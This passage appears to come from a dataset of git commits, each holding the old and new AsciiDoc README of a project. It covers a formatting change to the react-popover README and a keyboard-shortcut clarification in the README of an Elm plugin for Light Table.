help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow http:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3496a179f26275223204be1e972e489b60960c65","subject":"Update README.adoc","message":"Update README.adoc\n\nFormatting","repos":"littlebits\/react-popover,rainforestapp\/react-popover,gregory90\/react-popover,derekr\/react-popover,clara-labs\/react-popover,t3chnoboy\/react-popover,prayogoa\/react-popover","old_file":"README.adoc","new_file":"README.adoc","new_contents":"# react-popover\n:toc: macro\n\nA specification backed popover for react. link:https:\/\/littlebits.github.io\/react-popover\/build[Live demo].\n\n\ntoc::[]\n\n\n## Installation\n\n----\nnpm install react-popover\n----\n\n\n## Examples\n\nThe `examples` folder contains basic applications of this component. To try them locally run `npm start`.\n\n\n## API\n\n##### `export default` `Popover(props, target)`\n\n##### `props : {...}`\n\n##### `body : Node | Array Node`\nThe `popover` content. Content is rooted (becomes children of) `.Popover-body` and thus `body` can be a single `node` _or an array of `nodes`_.\n\n##### `isOpen : Boolean`\nDetermines Whether or not the popover is rendered.\n\n##### `preferPlace : String | Null`\nSets a *preference* of where to position the Popover. Only useful to specify placement in case of multiple available fits. Defaults to `null`. Valid values are:\n\n* `above | right | bottom | left` Prefer an explicit side.\n* `row | column` Prefer an orientation.\n* `start | end` Prefer an order.\n* `null` No preference, automatic resolution. This is the default.\n\n##### `onOuterAction : Function`\nA callback function executed every time the user does an action (`mousedown` or `touchstart`) outside the DOM tree of both `Popover` and `Target`. A canonical use-case is to automatically close the Popover on any external user action.\n* Plus support for standard props...: `className`, `style`\n\n##### `target : React Element`\n\n- The React Element that this popover will orient itself around. `target` `rendering tree` is unaffected. `Popover` _will_ become its `owner`.\n","old_contents":"# react-popover\n:toc: macro\n\nA specification backed popover for react. link:https:\/\/littlebits.github.io\/react-popover\/build[Live demo].\n\n\ntoc::[]\n\n\n## Installation\n\n----\nnpm install react-popover\n----\n\n\n## Examples\n\nThe `examples` folder contains basic applications of this component. To try them locally run `npm start`.\n\n\n## API\n\n#### `export default` `Popover(props, target)`\n\n##### `props : {...}`\n\n- `body : Node || Array Node`: The `popover` content. Content is rooted (becomes children of) `.Popover-body` and thus `body` can be a single `node` _or an array of `nodes`_.\n- `isOpen : Boolean`: Determines Whether or not the popover is rendered.\n- `preferPlace : String | Null`: Sets a *preference* of where to position the Popover. Only useful to specify placement in case of multiple available fits. Defaults to `null`. Valid values are:\n-- `above | right | bottom | left` Prefer an explicit side.\n-- `row | column` Prefer an orientation.\n-- `start | end` Prefer an order.\n-- `null` No preference, automatic resolution. This is the default.\n- `onOuterAction : Function` : A callback function executed every time the user does an action (`mousedown` or `touchstart`) outside the DOM tree of both `Popover` and `Target`. A canonical use-case is to automatically close the Popover on any external user action.\n- Plus support for standard props...: `className`, `style`\n\n##### `target : React Element`\n\n- The React Element that this popover will orient itself around. `target` `rendering tree` is unaffected. `Popover` _will_ become its `owner`.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d81c44935523b18d24ee9a8a9f775d2c94cc21ef","subject":"Clarify keyboard shortcut for both lint and format","message":"Clarify keyboard shortcut for both lint and format\n","repos":"rundis\/elm-light,rundis\/elm-light","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Elm LightTable plugin\nElm language plugin for Light Table\nv0.1.2, 2015-11-19: published\n:library: Asciidoctor\n:numbered:\n:idprefix:\n:toc: macro\n\n\nhttp:\/\/elm-lang.org\/[Elm] language plugin for Light Table\n\n\n== Installation\nInstall using the Light Table plugin manager.\nAlternatively you can clone it into `$LT_USER_HOME\\plugins`.\n\n\n== Preconditions\n* **LIghtTable 0.8-alpha or higher is required**\n* You will need to have the http:\/\/elm-lang.org\/install[elm-platform] (there is also a npm installer out there) installed and the following should be in your path:\n** https:\/\/github.com\/elm-lang\/elm-reactor[elm-reactor]\n** https:\/\/github.com\/elm-lang\/elm-make[elm-make]\n** https:\/\/github.com\/elm-lang\/elm-package[elm-package]\n** https:\/\/github.com\/elm-lang\/elm-repl[elm-repl]\n* For all commands\/features you will need to have a project folder with a `elm-package.json` file\n\n\nNOTE: Tested with elm 0.16.0 on OS\/X 10.9.5, Ubuntu 14.04 and Windows 10.\n\n== Resources\n* http:\/\/rundis.github.io\/blog\/2015\/elm_light.html[ScreenCast] - Demo of the features available in the first release of the plugin\n* http:\/\/elm-lang.org\/[elm-lang.org] - The home of Elm\n* https:\/\/github.com\/LightTable\/LightTable[Light Table] - GithHub home of Light Table\n\n== Overview\n\n=== Elm client\nFor pretty much any operation this plugin you support you need an elm client connection. An elm client connection\nis a small node process that the plugin typically will spawn automatically for any action that requires a elm client.\n\n.When the elm-client starts it;\n. Opens an elm-repl\n. Starts (and listens) to elm-reactor\n. Listens for commands from light table (eval, docs, autocompletions etc)\n\n\n.You may also manually connect to an elm project using the connect bare in Light Table\n* Invoke the command: `Connect: Add Connection`\n* Select **Elm** from the list of client types\n* If all goes well you will get a confirmation in the status bar that the project is connected\n\n\n.To disconnect\n* Invoke the command `Connect: Show connect bar`\n* Find the project in the list and click disconnect\n\nThe client connectionns is named after the the directory containing the elm-package.json\n\n=== Elm project\nIn the future the plugin might add support for geting started with just a simple .elm file, but you very quickly\nend up having to add some config especially a elm-package.json. So as mentioned in the preconditions, you will need one.\n\n\n.How does elm-light determine the project ?\n\nSay you have a project with the following structure\n\n[source]\n----\n\/home\/myuser\/projects\/hello-elm\/elm-package.json\n\/home\/myuser\/projects\/hello-elm\/hello.elm\n\/home\/myuser\/projects\/hello-elm\/src\/util.elm\n----\n\n\n* If you start of with evaluating hello.elm, the plugin will start looking for a elm-package.json in the same directory\nas the hello.elm file resides. So the elm client will use `\/home\/myuser\/projects\/hello-elm` as root path and the project assumed to be `hello-elm`\n* If you start of with evaluating util.elm, it will start looking for a `elm-package.json` in the `src` folder, since not finding one it will try the parent directory (and recurse until one found or none can be found).\nHence the root path and project name will be the same\n* If you (with the elm-client still running) later add a .elm file anywhere below `\/home\/myuser\/projects\/hello-elm` and eval or lint (or whatever) on it, the plugin\nwill assume it belongs to the same elm-client and use that.\n\n\n=== A few disclaimers\/general notes\n* If an operation takes some time to respond, it might be that it's because elm is installing packages (first time or you've changed the elm-package.json file)\n* If stuff does't work and you don't get anything sensible indicating why not, it's work trying to remove the folder elm-stuff and run `elm-package install`\nat the command line to see if packages installs correctly (I've experienced that it's not always reliable...)\n\n\n== Usage\n\n=== Linting\nimage::lint.png[width=500]\n\nTo lint an elm file use the command: `Elm: Lint selected file`\n\n* Errors are marked with red underline, warnings with yellow underline\n* Errors\/warnings in dependent files are shown in the console\n\n==== Details and navigation\n* To view details about an error or warning place your cursor inside an underline range and select the\ncommand `Linter: Show details at cursor`\n* To move to next lint result select command `Linter: Move to next result`\n* To move to previous lint result select command `Linter: Move to previous result`\n\n\nNOTE: Rember to save. Linting works on saved files !\n\n\n----\nTIP: Linting on save\nIf you wish to lint on save just add the following to your user behaviors\n\n[:editor.elm :lt.objs.editor.file\/on-save :elm.lint]\n----\n\n\n=== Make (to js)\nTo run make for your elm file\/project use the command: `Elm: Make selected file`\nA .js file is generated in the same directory as the .elm file resides.\nErrors and warnings are handled similar to linting.\n\n\n=== Testing\n[cols=\"1a,1a\"]\n|===\n\n| image::browsertests.png[width=400, role=\"thumb\"]\n| image::consoletests.png[width=400]\n|===\n\n.Preconditions\nThe plugin comes bundled with the https:\/\/github.com\/rtfeldman\/node-elm-test[node-elm-test] node package. It's slighly\nmodified to ensure that it uses the node instance that comes bundled with Light Table.\nSo you **don't** need to install node-elm-test !\n\nOf course you can run browser based tests without problems. The great benefit of using the console runner is that these tests can also be run as part of a ci build.\n\n\n\n==== Quick start\nThe plugin has a feature create a test skeleton subproject. From any (non-test) elm file;\n\n. Invoke the command `Elm: Add test subproject to current project`\n. The plugin will:\n.. Create a test directory\n.. Create a elm-package.json file based on the elm-package.json file in your current project. It will add dependencies\nto https:\/\/github.com\/deadfoxygrandpa\/Elm-Test[elm-test] and https:\/\/github.com\/laszlopandy\/elm-console[elm-console].\nIt will also set up source directories for your test project to include any source directories set up for your root project\n.. It will add a sample console TestRunner.elm and a sample Tests.elm\n.. Finally it will run elm-package install do set you up for subsequently quickly run your tests (this may take a little while the first time)\n. Now you have a great starting point to start writing tests running them\n\n\n==== Running tests\n. Open a test file\n. Select the command `Elm: Test current file`\n. One of two outcomes will occur:\n.. If the test is considered a console test (contains \"consoleRunner\" or \"Console\") ; The tests are run using https:\/\/github.com\/rtfeldman\/node-elm-test[node-elm-test].\nResults are shown in the console. In case of errors a message is displayed in the status bar\n.. If not a console test, the test is assumed to be a browser\/element test and the file is opened in the inline browser (backed by elm-reactor). Test are run and results are shown using elm-tests elementRunner (or stringRunner if that's what you are using)\n\n\nNOTE: The first time you run a browser test, you might need to reload the page as the reactor might not have completed starting before\nthe tests run (and hence the test file hasn't completed compiling yet). After that it's just a matter of changing tests and reloead (`ctrl-r`)\n\n\n\n\n=== Language docs\n.From an elm file;\n* Select the command: Docs: Search language docs (ctrl-shift-d)\n* Enter search criteria\n* Behold the results\n\nNOTE: Doc search currently picks a random elm file as the basis for search. And uses\nhttps:\/\/github.com\/ElmCast\/elm-oracle[elm-oracle] behind the scenes. Elm oracle is bundled with the plugin btw.\n\n=== Inline doc\n* With the cursor over something docable press ctrl+d.\n* Inline documentation is displayed (or an error message is shown on the status bar)\n* Ctrl+d again to close the inline doc\n\nNOTE: Only functions that are available through imports (explicit + elm defaults) are docable\n\n=== Autocomplete (incubating)\nOnce an elm editor has a connection (through use of linting, make, inline doc etc)\nthe autocompleter kicks in (sort of (: ).\n\nIt should kick in when you type something (like Signa ... should show completions from Signal etc)\n\n\n.To turn it off (and optionally turn on text hints) just edit your __User behaviors__\n[source,clojure]\n----\n [:editor.elm -:lt.plugins.elm-light\/use-local-hints] ; Turn off the autocompleter\n [:editor.clj :lt.plugins.auto-complete\/textual-hints] ; Enable textual hings again\n----\n\n\n\n\n=== Editor repl\nOnce connected to an elm-project in Light Table, a repl is started running in the background.\nThis means you can evaluate statements from within any given elm editor.\n\n* In an elm file:\n* Position the cursor within the region of a top level expression and press `cmd+enter`.\n* You may also select a region that constitutes of one or more top level statements and press `cmd+enter`\n** **However** results are shown next to the first line of the selection, even though the actual result might be the related to the\n last statement (or if an error, whatever line caused the error)\n* results are shown inline\n\n\nYou may reset the repl to start with a clean slate. Just select the command: `Elm: Restart repl for current project`\n\nNOTE: Results are currently only showed sensibly if you eval one top level statement at a time. Also the repl is shared\nbetween all elm editors for a given project.\n\n=== \"Anonymous\" repl\nYou may also create a repl that isn't backed by a file\n* Select the command `Elm repl: Open a elm repl`\n* You may now eval code as for an Editor repl\n\nNOTE: You need a connected elm project for this to work\n\n\n=== Elm-Reactor\nWhen you connect an elm project, elm-reactor is started in the background.\nTo support multiple projects running in parallell each projects elm-reactor gets a port from the port-range (3000 - 4000)\n\nConvenience commands has been added to view an elm file in the Light Table internal browser.\n.Either\n* Select the command `Elm: View current elm file in browser (elm-reactor)`\n* or `Elm: `Elm: View current elm file in browser with debugger (elm-reactor)` if you wish the debugger panel opened by default\n\n\nTIP: If you get a blank page (and\/or an error in the console about the address not being available), it might be\nbecause elm-reactor is running make in the background. You might need to be patient and refresh the browser (`cmd+r` for mac)\n\nWARNING: On Mac the elm-reactor starts two processes. You may experience occurences when the plugin is unable\nto terminate both these subprocesses appropriately for now. To be improved.\nYou may close connections by using the command `Connect: Show connect bar` and click disconnect for your elm project\n\n\n\n=== Package management\nThe plugin has an interface for doing some handy package related task. It's basically a thin wrapper over\nthe elm-package command with a UI to give you a better overview.\n\nimage::elm-light-pkgs.png[width=500]\n\n==== Open package manager\nFrom an editor with any file under your project, select the command `Elm: Show project packages`\n\nNOTE: You need to have a working network connection, as the it retrieves package info from the central elm package repository\n\n\n==== Add a new package\n* Search for a given package in the section for adding packages\n* Use up\/down arrows to navigate the dropdown\n* Use enter to select the package you wish to add\n* Select the version of the package you wish to install\n* Click `Add package`\n* Check the status bar\/console log for feedback on progress and success\/failure\n* If all goes well the view of packages gets updated (as will you elm-package.json file in the background as well)\n\nNOTE: The feedback from elm-package install is not always the most helpful when there are problems. Sometimes\nit even reports success when nothing has been done. Check out the github repo for elm-package for follow up on issues\nrelated to this. Be adviced that when a package is listed with the `exact` column empty, means something didn't go well\n, eventhough elm-package might have reported success.\n\n==== Remove package\nYou can remove packages that are specified in your elm-package.json.\n\n* Click on the `remove` button\nnext to the package in the listing.\n* Your elm-package.json file will get updated\n* elm-package install invoked to clean up\n* The listing will be updated (with potential transitive deps removed too)\n\n==== Handling other cases\nSometimes you need to edit your `elm-package.json` file directly for elm-package to know what to do.\nThere might also be the case you have defined a `elm-package.json` but haven't yet invoked any elm command\nthat resulted in package install. For such cases the `Refresh packages` button comes in handy !\n\n==== Package docs\nFor any packages installed (with an exact version) you may view the online docs:\n\n* In the list click on the package name\n* A LT browser tab is opened (or focused if one already exists) and the package doc for the selected package\nis displayed\n\n\n=== Dependency graph\n\nimage::elm-dep-graph.png[width=800]\n\nYou may view an inline dependency graph of you project dependencie.\n\n.Either\n* From any file under your project root invoke the command `Elm: Show dependency graph`\n* Alternatively click the `Show dependency graph` button from the package viewer\n\n.Additional info\n* Dashed arrows reprensents transitive dependencies\n* If you hover of a dependency you will see a short package summary\n* Dependencies found in elm-package.json that `elm-package` failed to install will\nbe shown with a red color\n* When you update packages in the package viewer, the graph is automatically refreshed\n\n\n\nNOTE: You will need an internet connection for this to work (uses package.elm.lang.org)\n\n=== Elm format\nIn an effort to standardize how Elm code should be formatted, https:\/\/github.com\/avh4\/elm-format[elm-format] was\ncreated. It is still in alpha, but I figured you might just as well start playing with it.\n\n.Precondition\nYou will need to install elm-format and make sure the executable is available in your path for it to work from\nthe plugin. You'll find install instructions on the https:\/\/github.com\/avh4\/elm-format[elm-format] readme.\n\n\n.Format editor contents\n* With an elm file open, select the command `Elm: Format editor contents`\n* If no errors the whole editor is formatted (but any format changes aren't saved)\n* If there are any errors (typically syntax errors), a message is shown in the Statusbar and details can be found in the console\n\n\n.Format top level expression\nIf for some reason you find yourself wanting to just format a top level expression, this is the command for you.\n* Place the cursor somewhere within the top level expression you wish to format\n* Select the command `Elm: Format top level expression at point`\n\n\n.Format a file\n* With an elm file open, select the command `Elm: Format file`\n\nWARNING: Any unsaved changes will be lost when running this command. This command updates the file backing the editor\nin question.\n\n\n\n.Adding keyboard shortcuts\n[source,clojure]\n----\n\n [:editor.elm.common \"cmd-shift-l\" :elm-format-expression]\n [:editor.elm.common \"cmd-ctrl-l\" :elm-format-buffer]\n----\n\n\n----\nTIP: Format and Lint on save\nIf you wish to format and lint on every save just add the following to your user keymap\n\n```[:editor.elm \"ctrl-s\" :save :elm-format :elm.lint]```\n\nHowever if you added linting when saving to your user behaviors, you would want to remove that otherwise you'll\nbe double linting !\n----\n\n\n\n\n=== Note on editor commands\n\n\n==== Select top-level statements\nIf you wish to select a top level statement just invoke the command `Elm: Select top level expression from current expression`\n\nNOTE: The selection algorithm is sort of naive, so there might be cases when the selection doesn't work out quite as you'd hope.\nIn most cases it should work sensibly though.\n\n\n.To enable as keyboard shortcut in both elm editors and anonymous elm repl\n[source,clojure]\n----\n [:editor.elm.common \"alt-shift-s\" :elm.select.top.level] ; modify keybinding to your liking !\n----\n\n\n== Contributing\nPull requests are most welcome. Please do not include the transpiled files (*_compiled*) in the PR.\n\n== History\n* 0.3.4 Updated to supprt elm-format 0.2-alpha\n** Added format buffer (keeps unsaved changes) and format expression commands\n* 0.3.3 Fix compatibility with LT 0.8.1. Also tweaked the autocompletion to be a little faster and more accurate.\n* 0.3.2 Module aware autocomplete and remove leading pipes from repl results\n* 0.3.1 Added an inline project dependency graph (using d3)\n* 0.3.0 Added windows support. See github release notes for details\n* 0.2.0 Improved linting, introduced test support and support for elm-format\n* 0.1.3 Bugfix: Forgot to include react.js (used for rendering package ui)\n* 0.1.2 Package manager and 0.16.0 fix\n** UI for managing your project packages.\n** 0.16.0 fix: Remove ansi color codes from errors and warnings shown inline\n* 0.1.1 Maintenance release:\n** Feature to select top level expressions\n** Eval in repl with no selection automatically selects top level expression based on cursor position\n** Syntax highlight multiline strings `\"\"\"`\n** Allow user to select to browse file in reactor with or without debugger\n** Fix: Allow reuse of released reactor ports\n** Add tag :editor.elm.common to allow users to configure common behaviors\/commands for repl and editors more easily\n* 0.1.0 Initial release\n\n== License\nMIT, same as Light Table. See LICENSE.md for details.\n\n\n\n\n\n\n\n\n\n","old_contents":"= Elm LightTable plugin\nElm language plugin for Light Table\nv0.1.2, 2015-11-19: published\n:library: Asciidoctor\n:numbered:\n:idprefix:\n:toc: macro\n\n\nhttp:\/\/elm-lang.org\/[Elm] language plugin for Light Table\n\n\n== Installation\nInstall using the Light Table plugin manager.\nAlternatively you can clone it into `$LT_USER_HOME\\plugins`.\n\n\n== Preconditions\n* **LIghtTable 0.8-alpha or higher is required**\n* You will need to have the http:\/\/elm-lang.org\/install[elm-platform] (there is also a npm installer out there) installed and the following should be in your path:\n** https:\/\/github.com\/elm-lang\/elm-reactor[elm-reactor]\n** https:\/\/github.com\/elm-lang\/elm-make[elm-make]\n** https:\/\/github.com\/elm-lang\/elm-package[elm-package]\n** https:\/\/github.com\/elm-lang\/elm-repl[elm-repl]\n* For all commands\/features you will need to have a project folder with a `elm-package.json` file\n\n\nNOTE: Tested with elm 0.16.0 on OS\/X 10.9.5, Ubuntu 14.04 and Windows 10.\n\n== Resources\n* http:\/\/rundis.github.io\/blog\/2015\/elm_light.html[ScreenCast] - Demo of the features available in the first release of the plugin\n* http:\/\/elm-lang.org\/[elm-lang.org] - The home of Elm\n* https:\/\/github.com\/LightTable\/LightTable[Light Table] - GithHub home of Light Table\n\n== Overview\n\n=== Elm client\nFor pretty much any operation this plugin you support you need an elm client connection. An elm client connection\nis a small node process that the plugin typically will spawn automatically for any action that requires a elm client.\n\n.When the elm-client starts it;\n. Opens an elm-repl\n. Starts (and listens) to elm-reactor\n. Listens for commands from light table (eval, docs, autocompletions etc)\n\n\n.You may also manually connect to an elm project using the connect bare in Light Table\n* Invoke the command: `Connect: Add Connection`\n* Select **Elm** from the list of client types\n* If all goes well you will get a confirmation in the status bar that the project is connected\n\n\n.To disconnect\n* Invoke the command `Connect: Show connect bar`\n* Find the project in the list and click disconnect\n\nThe client connectionns is named after the the directory containing the elm-package.json\n\n=== Elm project\nIn the future the plugin might add support for geting started with just a simple .elm file, but you very quickly\nend up having to add some config especially a elm-package.json. So as mentioned in the preconditions, you will need one.\n\n\n.How does elm-light determine the project ?\n\nSay you have a project with the following structure\n\n[source]\n----\n\/home\/myuser\/projects\/hello-elm\/elm-package.json\n\/home\/myuser\/projects\/hello-elm\/hello.elm\n\/home\/myuser\/projects\/hello-elm\/src\/util.elm\n----\n\n\n* If you start of with evaluating hello.elm, the plugin will start looking for a elm-package.json in the same directory\nas the hello.elm file resides. So the elm client will use `\/home\/myuser\/projects\/hello-elm` as root path and the project assumed to be `hello-elm`\n* If you start of with evaluating util.elm, it will start looking for a `elm-package.json` in the `src` folder, since not finding one it will try the parent directory (and recurse until one found or none can be found).\nHence the root path and project name will be the same\n* If you (with the elm-client still running) later add a .elm file anywhere below `\/home\/myuser\/projects\/hello-elm` and eval or lint (or whatever) on it, the plugin\nwill assume it belongs to the same elm-client and use that.\n\n\n=== A few disclaimers\/general notes\n* If an operation takes some time to respond, it might be that it's because elm is installing packages (first time or you've changed the elm-package.json file)\n* If stuff does't work and you don't get anything sensible indicating why not, it's work trying to remove the folder elm-stuff and run `elm-package install`\nat the command line to see if packages installs correctly (I've experienced that it's not always reliable...)\n\n\n== Usage\n\n=== Linting\nimage::lint.png[width=500]\n\nTo lint an elm file use the command: `Elm: Lint selected file`\n\n* Errors are marked with red underline, warnings with yellow underline\n* Errors\/warnings in dependent files are shown in the console\n\n==== Details and navigation\n* To view details about an error or warning place your cursor inside an underline range and select the\ncommand `Linter: Show details at cursor`\n* To move to next lint result select command `Linter: Move to next result`\n* To move to previous lint result select command `Linter: Move to previous result`\n\n\nNOTE: Rember to save. Linting works on saved files !\n\n\n----\nTIP: Linting on save\nIf you wish to lint on save just add the following to your user behaviors\n\n[:editor.elm :lt.objs.editor.file\/on-save :elm.lint]\n----\n\n\n=== Make (to js)\nTo run make for your elm file\/project use the command: `Elm: Make selected file`\nA .js file is generated in the same directory as the .elm file resides.\nErrors and warnings are handled similar to linting.\n\n\n=== Testing\n[cols=\"1a,1a\"]\n|===\n\n| image::browsertests.png[width=400, role=\"thumb\"]\n| image::consoletests.png[width=400]\n|===\n\n.Preconditions\nThe plugin comes bundled with the https:\/\/github.com\/rtfeldman\/node-elm-test[node-elm-test] node package. It's slighly\nmodified to ensure that it uses the node instance that comes bundled with Light Table.\nSo you **don't** need to install node-elm-test !\n\nOf course you can run browser based tests without problems. The great benefit of using the console runner is that these tests can also be run as part of a ci build.\n\n\n\n==== Quick start\nThe plugin has a feature create a test skeleton subproject. From any (non-test) elm file;\n\n. Invoke the command `Elm: Add test subproject to current project`\n. The plugin will:\n.. Create a test directory\n.. Create a elm-package.json file based on the elm-package.json file in your current project. It will add dependencies\nto https:\/\/github.com\/deadfoxygrandpa\/Elm-Test[elm-test] and https:\/\/github.com\/laszlopandy\/elm-console[elm-console].\nIt will also set up source directories for your test project to include any source directories set up for your root project\n.. It will add a sample console TestRunner.elm and a sample Tests.elm\n.. Finally it will run elm-package install do set you up for subsequently quickly run your tests (this may take a little while the first time)\n. Now you have a great starting point to start writing tests running them\n\n\n==== Running tests\n. Open a test file\n. Select the command `Elm: Test current file`\n. One of two outcomes will occur:\n.. If the test is considered a console test (contains \"consoleRunner\" or \"Console\") ; The tests are run using https:\/\/github.com\/rtfeldman\/node-elm-test[node-elm-test].\nResults are shown in the console. In case of errors a message is displayed in the status bar\n.. If not a console test, the test is assumed to be a browser\/element test and the file is opened in the inline browser (backed by elm-reactor). Test are run and results are shown using elm-tests elementRunner (or stringRunner if that's what you are using)\n\n\nNOTE: The first time you run a browser test, you might need to reload the page as the reactor might not have completed starting before\nthe tests run (and hence the test file hasn't completed compiling yet). After that it's just a matter of changing tests and reloead (`ctrl-r`)\n\n\n\n\n=== Language docs\n.From an elm file;\n* Select the command: Docs: Search language docs (ctrl-shift-d)\n* Enter search criteria\n* Behold the results\n\nNOTE: Doc search currently picks a random elm file as the basis for search. And uses\nhttps:\/\/github.com\/ElmCast\/elm-oracle[elm-oracle] behind the scenes. Elm oracle is bundled with the plugin btw.\n\n=== Inline doc\n* With the cursor over something docable press ctrl+d.\n* Inline documentation is displayed (or an error message is shown on the status bar)\n* Ctrl+d again to close the inline doc\n\nNOTE: Only functions that are available through imports (explicit + elm defaults) are docable\n\n=== Autocomplete (incubating)\nOnce an elm editor has a connection (through use of linting, make, inline doc etc)\nthe autocompleter kicks in (sort of (: ).\n\nIt should kick in when you type something (like Signa ... should show completions from Signal etc)\n\n\n.To turn it off (and optionally turn on text hints) just edit your __User behaviors__\n[source,clojure]\n----\n [:editor.elm -:lt.plugins.elm-light\/use-local-hints] ; Turn off the autocompleter\n [:editor.clj :lt.plugins.auto-complete\/textual-hints] ; Enable textual hings again\n----\n\n\n\n\n=== Editor repl\nOnce connected to an elm-project in Light Table, a repl is started running in the background.\nThis means you can evaluate statements from within any given elm editor.\n\n* In an elm file:\n* Position the cursor within the region of a top level expression and press `cmd+enter`.\n* You may also select a region that constitutes of one or more top level statements and press `cmd+enter`\n** **However** results are shown next to the first line of the selection, even though the actual result might be the related to the\n last statement (or if an error, whatever line caused the error)\n* results are shown inline\n\n\nYou may reset the repl to start with a clean slate. Just select the command: `Elm: Restart repl for current project`\n\nNOTE: Results are currently only showed sensibly if you eval one top level statement at a time. Also the repl is shared\nbetween all elm editors for a given project.\n\n=== \"Anonymous\" repl\nYou may also create a repl that isn't backed by a file\n* Select the command `Elm repl: Open a elm repl`\n* You may now eval code as for an Editor repl\n\nNOTE: You need a connected elm project for this to work\n\n\n=== Elm-Reactor\nWhen you connect an elm project, elm-reactor is started in the background.\nTo support multiple projects running in parallell each projects elm-reactor gets a port from the port-range (3000 - 4000)\n\nConvenience commands has been added to view an elm file in the Light Table internal browser.\n.Either\n* Select the command `Elm: View current elm file in browser (elm-reactor)`\n* or `Elm: `Elm: View current elm file in browser with debugger (elm-reactor)` if you wish the debugger panel opened by default\n\n\nTIP: If you get a blank page (and\/or an error in the console about the address not being available), it might be\nbecause elm-reactor is running make in the background. You might need to be patient and refresh the browser (`cmd+r` for mac)\n\nWARNING: On Mac the elm-reactor starts two processes. You may experience occurences when the plugin is unable\nto terminate both these subprocesses appropriately for now. To be improved.\nYou may close connections by using the command `Connect: Show connect bar` and click disconnect for your elm project\n\n\n\n=== Package management\nThe plugin has an interface for doing some handy package related task. It's basically a thin wrapper over\nthe elm-package command with a UI to give you a better overview.\n\nimage::elm-light-pkgs.png[width=500]\n\n==== Open package manager\nFrom an editor with any file under your project, select the command `Elm: Show project packages`\n\nNOTE: You need to have a working network connection, as the it retrieves package info from the central elm package repository\n\n\n==== Add a new package\n* Search for a given package in the section for adding packages\n* Use up\/down arrows to navigate the dropdown\n* Use enter to select the package you wish to add\n* Select the version of the package you wish to install\n* Click `Add package`\n* Check the status bar\/console log for feedback on progress and success\/failure\n* If all goes well the view of packages gets updated (as will you elm-package.json file in the background as well)\n\nNOTE: The feedback from elm-package install is not always the most helpful when there are problems. Sometimes\nit even reports success when nothing has been done. Check out the github repo for elm-package for follow up on issues\nrelated to this. Be adviced that when a package is listed with the `exact` column empty, means something didn't go well\n, eventhough elm-package might have reported success.\n\n==== Remove package\nYou can remove packages that are specified in your elm-package.json.\n\n* Click on the `remove` button\nnext to the package in the listing.\n* Your elm-package.json file will get updated\n* elm-package install invoked to clean up\n* The listing will be updated (with potential transitive deps removed too)\n\n==== Handling other cases\nSometimes you need to edit your `elm-package.json` file directly for elm-package to know what to do.\nThere might also be the case you have defined a `elm-package.json` but haven't yet invoked any elm command\nthat resulted in package install. For such cases the `Refresh packages` button comes in handy !\n\n==== Package docs\nFor any packages installed (with an exact version) you may view the online docs:\n\n* In the list click on the package name\n* A LT browser tab is opened (or focused if one already exists) and the package doc for the selected package\nis displayed\n\n\n=== Dependency graph\n\nimage::elm-dep-graph.png[width=800]\n\nYou may view an inline dependency graph of you project dependencie.\n\n.Either\n* From any file under your project root invoke the command `Elm: Show dependency graph`\n* Alternatively click the `Show dependency graph` button from the package viewer\n\n.Additional info\n* Dashed arrows reprensents transitive dependencies\n* If you hover of a dependency you will see a short package summary\n* Dependencies found in elm-package.json that `elm-package` failed to install will\nbe shown with a red color\n* When you update packages in the package viewer, the graph is automatically refreshed\n\n\n\nNOTE: You will need an internet connection for this to work (uses package.elm.lang.org)\n\n=== Elm format\nIn an effort to standardize how Elm code should be formatted, https:\/\/github.com\/avh4\/elm-format[elm-format] was\ncreated. It is still in alpha, but I figured you might just as well start playing with it.\n\n.Precondition\nYou will need to install elm-format and make sure the executable is available in your path for it to work from\nthe plugin. You'll find install instructions on the https:\/\/github.com\/avh4\/elm-format[elm-format] readme.\n\n\n.Format editor contents\n* With an elm file open, select the command `Elm: Format editor contents`\n* If no errors the whole editor is formatted (but any format changes aren't saved)\n* If there are any errors (typically syntax errors), a message is shown in the Statusbar and details can be found in the console\n\n\n.Format top level expression\nIf for some reason you find yourself wanting to just format a top level expression, this is the command for you.\n* Place the cursor somewhere within the top level expression you wish to format\n* Select the command `Elm: Format top level expression at point`\n\n\n.Format a file\n* With an elm file open, select the command `Elm: Format file`\n\nWARNING: Any unsaved changes will be lost when running this command. This command updates the file backing the editor\nin question.\n\n\n\n.Adding keyboard shortcuts\n[source,clojure]\n----\n\n [:editor.elm.common \"cmd-shift-l\" :elm-format-expression]\n [:editor.elm.common \"cmd-ctrl-l\" :elm-format-buffer]\n----\n\n\n----\nTIP: Format and Lint on save\nIf you wish to format and lint on every save just add the following to your user behaviors\n\n[:editor.elm \"ctrl-s\" :save :elm-format :elm.lint]\n----\n\n\n\n\n=== Note on editor commands\n\n\n==== Select top-level statements\nIf you wish to select a top level statement just invoke the command `Elm: Select top level expression from current expression`\n\nNOTE: The selection algorithm is sort of naive, so there might be cases when the selection doesn't work out quite as you'd hope.\nIn most cases it should work sensibly though.\n\n\n.To enable as keyboard shortcut in both elm editors and anonymous elm repl\n[source,clojure]\n----\n [:editor.elm.common \"alt-shift-s\" :elm.select.top.level] ; modify keybinding to your liking !\n----\n\n\n== Contributing\nPull requests are most welcome. Please do not include the transpiled files (*_compiled*) in the PR.\n\n== History\n* 0.3.4 Updated to supprt elm-format 0.2-alpha\n** Added format buffer (keeps unsaved changes) and format expression commands\n* 0.3.3 Fix compatibility with LT 0.8.1. Also tweaked the autocompletion to be a little faster and more accurate.\n* 0.3.2 Module aware autocomplete and remove leading pipes from repl results\n* 0.3.1 Added an inline project dependency graph (using d3)\n* 0.3.0 Added windows support. See github release notes for details\n* 0.2.0 Improved linting, introduced test support and support for elm-format\n* 0.1.3 Bugfix: Forgot to include react.js (used for rendering package ui)\n* 0.1.2 Package manager and 0.16.0 fix\n** UI for managing your project packages.\n** 0.16.0 fix: Remove ansi color codes from errors and warnings shown inline\n* 0.1.1 Maintenance release:\n** Feature to select top level expressions\n** Eval in repl with no selection automatically selects top level expression based on cursor position\n** Syntax highlight multiline strings `\"\"\"`\n** Allow user to select to browse file in reactor with or without debugger\n** Fix: Allow reuse of released reactor ports\n** Add tag :editor.elm.common to allow users to configure 